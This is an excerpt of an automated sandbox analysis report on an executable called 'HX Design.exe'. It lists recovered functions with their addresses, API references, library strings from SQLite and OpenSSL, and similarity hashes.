Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: out of memory$string or blob too big
API String ID: 4225454184-2410398255
Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
Instruction ID: b7fca4542676dd61eee9a59037e829533bd824f236e7cc8f5621e4c312598e04
Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
Instruction Fuzzy Hash: 2DC1E262F4A65393FB20AB19C160A7C67E4EF17B84F046435CB6E477E9DE2CE5468310

Function 00007FFE00311A05 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 283COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE00320C5B

Strings

d2i_SSL_SESSION, xrefs: 00007FFE00320AC2, 00007FFE00320B47, 00007FFE00320B88, 00007FFE00320DA2
..\s\ssl\ssl_asn1.c, xrefs: 00007FFE00320ACE, 00007FFE00320B53, 00007FFE00320B94, 00007FFE00320D34, 00007FFE00320DAE, 00007FFE00320DFA, 00007FFE00320E6F

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
API String ID: 3568877910-384499812
Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction ID: f4f48fa12e26c3bd6b6a94a3b5a1ea5b769809a1d3ffeceb780607cd060034db
Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
Instruction Fuzzy Hash: 53D13732A09B8292EB6ADF25D5902BD23A4FB54B84F484036DF4D4B7AADF3CE555C310

Function 00007FFE00312126 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE0033F76D

Strings

ssl_get_prev_session, xrefs: 00007FFE0033F732, 00007FFE0033F7D4, 00007FFE0033F884
..\s\ssl\ssl_sess.c, xrefs: 00007FFE0033F73E, 00007FFE0033F7E0, 00007FFE0033F890

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
API String ID: 3568877910-1331951588
Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction ID: 5a55758a0f04feb063a55dd5aca00dc627f43d5ffd7f4a5d99e48159fbdd952d
Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
Instruction Fuzzy Hash: F9C17C36A086828AFA6A9A25D5907BD63A4FB84F88F844135DF4D4B7B9CF3CE451C700

Function 00007FFDFB3505E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB350782
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB35079B

Strings

string or blob too big, xrefs: 00007FFDFB3508AD

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: string or blob too big
API String ID: 4225454184-2803948771
Opcode ID: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
Instruction ID: eee27bc2ce5b8f2ed0023464cb0462959486ba0407300519ba54ab4a688680df
Opcode Fuzzy Hash: 6a3b792af28c5662f73222d4b4933a8ca5c4e6cb800e1e0a16e3037f37ecc6fe
Instruction Fuzzy Hash: 08918921F8A20396FB68AB159565BB927E4EF80B88F044135DE6D073EADE3EF445C740

Function 00007FFDFB32CE50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB32D0E0

Strings

too many SQL variables, xrefs: 00007FFDFB32D102
variable number must be between ?1 and ?%d, xrefs: 00007FFDFB32CFF6

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 4225454184-515162456
Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
Instruction ID: 4ba324f17418856dff885a93c4bea277003cba7be3643e155ba6abbf3ef49bdd
Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
Instruction Fuzzy Hash: 3C81CD72B0A65786EB54EB11E468EB977E5FB44B84F858032DE6C476E8EF38E541C300

Function 00007FFDFB34A8B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB34A95D

Strings

no such collation sequence: %s, xrefs: 00007FFDFB34AAFC
BINARY, xrefs: 00007FFDFB34A8BC

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: BINARY$no such collation sequence: %s
API String ID: 4225454184-2451720372
Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
Instruction ID: 6d6635ca6bbd39af5dad9021a5b83420dc37554f64a0cd83f3d6a5541f178f8a
Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
Instruction Fuzzy Hash: B971B322B4AA4392EB15AF2185607B963E0EF54BA4F585231DE3C072E9DF3CE295C340

Function 00007FFDFB3499C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

index '%q', xrefs: 00007FFDFB349A12

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID:
String ID: index '%q'
API String ID: 0-1628151297
Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
Instruction ID: 2a79508bf7b7b6945a0ed03fbda9b8628b488a24c284b4e29d8a30d26b9cc920
Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
Instruction Fuzzy Hash: 6D719F32F19656CEEB10AB65D860ABC3BB0BB48B58F040635DE2E57BECDF7895458700

Function 00007FFDFB2E4A30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2E4BCC

Strings

%02d, xrefs: 00007FFDFB2E4B6E, 00007FFDFB2E4BD5

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %02d
API String ID: 4225454184-896308400
Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
Instruction ID: 680d2eb0b95e5eb7b6a4c6365c5e521cc6bba27e5fe86b8360c4c162eb1da572
Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
Instruction Fuzzy Hash: EA71CF32B1969786EB208B66E460BFD7760FB84748F104035EEAD57AADDF39E445CB00

Function 00007FFDFB37D690 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFDFB37D93A,?,?,?,00007FFDFB37DCFB), ref: 00007FFDFB37D8A7

Strings

CRE, xrefs: 00007FFDFB37D7EF
INS, xrefs: 00007FFDFB37D809

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: CRE$INS
API String ID: 4225454184-4116259516
Opcode ID: ce2989f60ac5e8a8cae162af8014ecdc409c5b87f6a41c36f512a7284888e5ab
Instruction ID: 808ba07a9f50de61730df38e62c8f1bad97f387447c7312f9cdb16ebf8f2d6a0
Opcode Fuzzy Hash: ce2989f60ac5e8a8cae162af8014ecdc409c5b87f6a41c36f512a7284888e5ab
Instruction Fuzzy Hash: 97517C65B4E68392EB61AB16A460A7963E1EF80FC4F684235CD7D477EDDE2CE4018300

Function 00007FFE00311EBF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE00319154

Strings

..\s\ssl\d1_srtp.c, xrefs: 00007FFE0031908B, 00007FFE00319183
ssl_ctx_make_profiles, xrefs: 00007FFE0031907F, 00007FFE0031917A

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
API String ID: 4069847057-118859582
Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction ID: 10b9ae61c0421b03f42d5ff7597e3660aee59a5151078850dcdf68e5be7de704
Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
Instruction Fuzzy Hash: 3B518121B0D64396FA539726A8143FE5391AF48B94F584432DF0D477EEDE3DE8828700

Function 00007FF732085B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732081760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732081793

_get_daylight.LIBCMT ref: 00007FF732085C34
_get_daylight.LIBCMT ref: 00007FF732085C45

Strings

?, xrefs: 00007FF732085BC5

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: 06acb41969bff98b8cf1a810aefbbc501edfce859f636a530e9ecd1182c6261c
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: E8414822A0828266FB60BB65D40137BEFA0EF90BA4F944235EF5C06AD5DFBCD445DB10

Function 00007FF732079014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732079046

Part of subcall function 00007FF73207A948: HeapFree.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A95E
Part of subcall function 00007FF73207A948: GetLastError.KERNEL32(?,?,?,00007FF732082D22,?,?,?,00007FF732082D5F,?,?,00000000,00007FF732083225,?,?,?,00007FF732083157), ref: 00007FF73207A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73206CBA5), ref: 00007FF732079064

Strings

C:\Users\user\Desktop\HX Design.exe, xrefs: 00007FF732079052

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\HX Design.exe
API String ID: 3580290477-898117248
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: 5393ec9a557832e947cf457e9475c331e447da74764146fa45b56320814ce413
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: 5F41A032A08B46A9EB54FF29D4400BDA3A4EF447D0BD54035E98D43B85DF7CE4A9E360

Function 00007FF73207CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF73207CD4F
GetLastError.KERNEL32 ref: 00007FF73207CD71

Strings

U, xrefs: 00007FF73207CCFB

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: c988a1df6911ca3dc0b333fb9211893b91e4159cc8f7deeba8f837b968dc4f28
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: F741F532B18A8191EB60EF29E4443BAA7A0FB88784FC04131EE4D87B98EF7CD405D750

Function 00007FFDFB2E9880 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2E999E
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2E99E2

Strings

@, xrefs: 00007FFDFB2E99CC

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: @
API String ID: 4225454184-2766056989
Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
Instruction ID: 6dd808fc768c6a01ab546fad88f899a449c12a28a58e265e4f43b54e271ed62c
Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
Instruction Fuzzy Hash: 9F418F21F0F693C6F7118B26AA709767390AF45788F04493ADC6D422FDDF3CA292C644

Function 00007FFE003180D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFE0031811D
SystemTimeToFileTime.KERNEL32 ref: 00007FFE0031812D

Strings

gfff, xrefs: 00007FFE0031815F

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction ID: 85c5c4889fbbe77bcb9d72dabaf8e3dcdb5a9e06aca918a9376c434662c4f975
Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
Instruction Fuzzy Hash: 77217E72A08A86D6DB958F29E8112B977E4EB8CB94F448035DB4DC77A9EF3CD1418B00

Function 00007FF73207F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF73207F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF73207F64A

Strings

:, xrefs: 00007FF73207F60E

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction ID: 79cdbe61eb4637508e46f815839cba5eab8251c58c5db154b79e27c57ffdf7f8
Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction Fuzzy Hash: 03212B72B1828191EB20BB19D44827EB3B1FBC4B84FC54035DA5D43695DFBCD548DB60

Function 00007FF73206FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF73206FD98
RaiseException.KERNEL32 ref: 00007FF73206FDD9

Strings

csm, xrefs: 00007FF73206FDC6

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
